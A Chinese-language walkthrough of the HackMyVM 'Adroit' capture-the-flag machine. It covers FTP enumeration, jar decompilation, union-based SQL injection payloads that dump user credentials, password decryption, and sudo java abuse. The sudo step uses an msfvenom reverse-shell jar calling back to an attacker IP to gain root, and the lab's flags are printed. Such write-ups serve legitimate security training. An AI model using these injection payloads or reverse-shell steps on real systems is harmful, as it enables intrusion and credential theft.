【hackmyvm】Adroit靶机wp

---

tags:

• HMV
• java反编译
• SQL注入

1. 基本信息^toc

靶机链接 https://hackmyvm.eu/machines/machine.php?vm=Adroit
作者 alienum
难度 ⭐️⭐️⭐️⭐️️

2. 信息收集

┌──(root㉿kali)-[~]
└─# fscan -h 192.168.80.11___                              _/ _ \     ___  ___ _ __ __ _  ___| | __/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\fscan version: 1.8.4
start infoscan
192.168.80.11:3306 open
192.168.80.11:3000 open
192.168.80.11:21 open
192.168.80.11:22 open
[*] alive ports len is: 4
start vulscan
[+] ftp 192.168.80.11:21:anonymous[->]pub

ftp

ftp> ls -a
229 Entering Extended Passive Mode (|||40570|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Mar 19  2021 .
drwxr-xr-x    3 ftp      ftp          4096 Jan 14  2021 ..
-rw-r--r--    1 ftp      ftp          5451 Jan 14  2021 adroitclient.jar
-rw-r--r--    1 ftp      ftp           229 Mar 19  2021 note.txt
-rw-r--r--    1 ftp      ftp         36430 Jan 14  2021 structure.PNG

structrue.png

3. java反编译

获取到secret Sup3rS3cur3Dr0it

域名 adroit.local

用户名 zeus 域名 god.thunder.olympus

添加一个域名 adroit.local

尝试运行一下jar包

这里我用jdk8运行不了 ，切换到jdk11可以运行

提示输入账户密码 挨个测试即可

┌──(root㉿kali)-[/home/kali/hmv/Adroit]
└─# java -jar adroitclient.jar
Enter the username :
zeus
Enter the password :
Sup3rS3cur3Dr0it
Wrong username or password   ┌──(root㉿kali)-[/home/kali/hmv/Adroit]
└─# java -jar adroitclient.jar
Enter the username :
zeus
Enter the password :
god.thunder.olympus
Options [ post | get ] :
get
Enter the phrase identifier :
1

god.thunder.olympus 就是密码

4. sql注入

┌──(root㉿kali)-[/home/kali/hmv/Adroit]
└─# java -jar adroitclient.jar
Enter the username :
zeus
Enter the password :
god.thunder.olympus
Options [ post | get ] :
get
Enter the phrase identifier :1 union select 1,database() -- -
--> adroit1 union select 1,group_concat(table_name) FROM information_schema.tables WHERE table_schema ='adroit' -- -
-->  ideas,users1 union select 1,group_concat(column_name) from information_schema.columns where table_name ='users' -- -
--> 
id,username,password,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS1 union select 1,group_concat(username,0x3a,password) from users -- -
--> writer:l4A+n+p+xSxDcYCl0mgxKr015+OEC3aOfdrWafSqwpY=

获取到了账户密码 writer:l4A+n+p+xSxDcYCl0mgxKr015+OEC3aOfdrWafSqwpY=
但是密码是加密的

但是加密的

5. 解密密码

解密的代码可以在jar包反编译中发现

密钥上面获取到了是 Sup3rS3cur3Dr0it
但是注意这里需要将0换成O
所以正确的密钥是 Sup3rS3cur3DrOit

参考 Mikannse的wp对这个进行解密

获取到密码是 just.write.my.ideas

6. 提权

利用账户密码登录

writer ： just.write.my.ideas
┌──(root㉿kali)-[/home/kali/hmv/Adroit]
└─# ssh writer@192.168.80.11
writer@192.168.80.11''s password:
Linux adroit 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jan 14 23:14:06 2021 from 10.0.2.15
writer@adroit:~$ id
uid=1000(writer) gid=1000(writer) groups=1000(writer),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
writer@adroit:~$ whoami
writer

writer@adroit:~$ sudo -l
[sudo] password for writer:
Matching Defaults entries for writer on adroit:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser writer may run the following commands on adroit:(root) /usr/bin/java -jar /tmp/testingmyapp.jar

msf生成jar包 反弹shell

msfvenom -p java/shell_reverse_tcp lhost=192.168.80.5 lport=4444 -f jar -o reverse.jarwriter@adroit:/tmp$ cp reverse.jar  /tmp/testingmyapp.jar
writer@adroit:/tmp$ sudo -u root java -jar /tmp/testingmyapp.jar[17:54:28] Welcome to pwncat 🐈!                                                                       __main__.py:164
[17:56:16] received connection from 192.168.80.11:51550                                                     bind.py:84
[17:56:17] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash                                  manager.py:957192.168.80.11:51550: registered new host w/ db                                               manager.py:957
(local) pwncat$
(remote) root@adroit:/tmp# whoami
root
(remote) root@adroit:/root# ls
root.txt
(remote) root@adroit:/root# cat root.txt
017a030885f25af277dd891d0f151845
(remote) root@adroit:/root# cd /home/writer/
(remote) root@adroit:/home/writer# cat user.txt
61de3a25161dcb2b88b5119457690c3c
(remote) root@adroit:/home/writer#

我觉得这个靶场不算难。难点只是在分析java代码那里，不过我看不懂java